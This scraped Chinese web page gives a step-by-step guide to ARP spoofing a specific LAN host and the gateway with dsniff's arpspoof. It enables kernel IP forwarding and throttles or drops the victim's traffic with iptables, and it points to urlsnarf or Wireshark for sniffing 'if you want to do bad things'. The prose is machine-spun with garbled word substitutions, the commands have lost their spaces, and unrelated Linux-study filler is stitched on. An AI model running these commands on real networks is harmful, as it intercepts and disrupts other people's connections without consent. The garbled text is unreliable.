Linux设计linux上限制局域网外部利用p2p软件的主机仓酷云

经常看到有人问用什么版本的linux好,其实只要你认真学习无论什么版本都挺好的。
windows下有p2p闭幕者，linux下咱有dsniff，先容：here，其的用处之一就是做arp棍骗，详细命令是arpspoof.
感化：

1. arpspoof将局域网内的方针主机大概是一切主机的发送数据包经由过程ARP棍骗来重指向。在利用互换机的局域网情况下是一个十分无效的办法来嗅探数据：)

复制代码

注重：kernel的ip转发必需要提早翻开
利用：

1. arpspoof[-iinterface][-ttarget]host

复制代码

1. -i用来唆使要利用的网卡接口，通常为eth0,

复制代码

1. -t用来唆使要棍骗的方针主机，假如不标明则默许为局域网外部的一切主机

复制代码

1. host你要截取数据包的主机，一般是网关

复制代码

详细利用：
情况archlinux,要限定的ip为192.168.0.29，本机ip为192.168.0.24,实行室网管为192.168.0.1
1安装

1. sudopacman-Sdsniff

复制代码

2开启内核转发和棍骗

1. #echo1>/proc/sys/net/ipv4/ip_forward

复制代码

#棍骗192.168.0.29，告知这台呆板网关192.168.0.1的MAC地点是本人(192.168.0.24)。

1. $sudoarpspoof-ieth0-t192.168.0.29192.168.0.1

复制代码

#棍骗192.168.0.1，告知网关192.168.0.29的MAC地点是本人(192.168.0.24)

1. $sudoarpspoof-ieth0-t192.168.0.1192.168.0.29

复制代码

192.168.0.29觉得192.168.0.24就是192.168.0.1，192.168.0.1觉得192.168.0.24就是192.168.0.29
3使用iptables入手下手限速
#192.168.0.29被限定每秒只能传输3个数据包了

1. $sudoiptables-AFORWARD-s192.168.0.29-mlimit--limit3/s-jACCEPT$sudoiptables-AFORWARD-d192.168.0.29-mlimit--limit3/s-jACCEPT$sudoiptables-AFORWARD-s192.168.0.29-jDROP$sudoiptables-AFORWARD-d192.168.0.29-jDROP

复制代码

4固然，假如你想干好事的话能够用urlsnarf大概wireshark之类的。。。。恩
参考材料：
http://microcai.gsalex.net/archives/2010/11/p2p-killer-for-linux.html
http://www.yuanma.org/data/2006/0914/article_1536.htm

安装和登录命令：login、shutdown、halt、reboot、mount、umount、chsh

感谢老师和同学们在学习上对我的帮助。

用户下达的命令解释给系统去执行，并将系统传回的信息再次解释给用户，估shell也称为命令解释器，有关命令的学习可参考论坛相关文章，精通英文也是学习Linux的关键。

随着实验课程的结束，理论课也该结束了，说实话教OS的这两位老师是我们遇到过的不错的老师（这话放这可能不太恰当）.

这种补充有助于他人在邮件列表/新闻组/论坛中搜索对你有过帮助的完整解决方案，这可能对他们也很有用。

仓酷云

和私有操作系统不同，各个Linux的发行版本的技术支持时间都较短，这对于Linux初学者是往往不够的。

了解Linux的网络安全，系统的安全，用户的安全等。安全对于每位用户，管理员来说是非常重要的。

Linux是参照Unix思想设计的，理解掌握Linux必须按照Unix思维来进行。思想性的转变比暂时性的技术提高更有用,因为他能帮助你加快学习速度。

熟读Linux系统有关知识，如系统目录树，有关内容可购书阅读或搜索论坛。

直到学习Linux这门课以后，我才知道，原来我错了。?

任何一个叫做操作系统的东西都是这样子构成的：内核+用户界面+一般应用程序。

安装一个新的软件时先看README,再看INSTALL然后看FAQ,最后才动手安装,这样遇到问题就知道为什么。如果Linux说明文档不看,结果出了问题再去论坛来找答案反而浪费时间。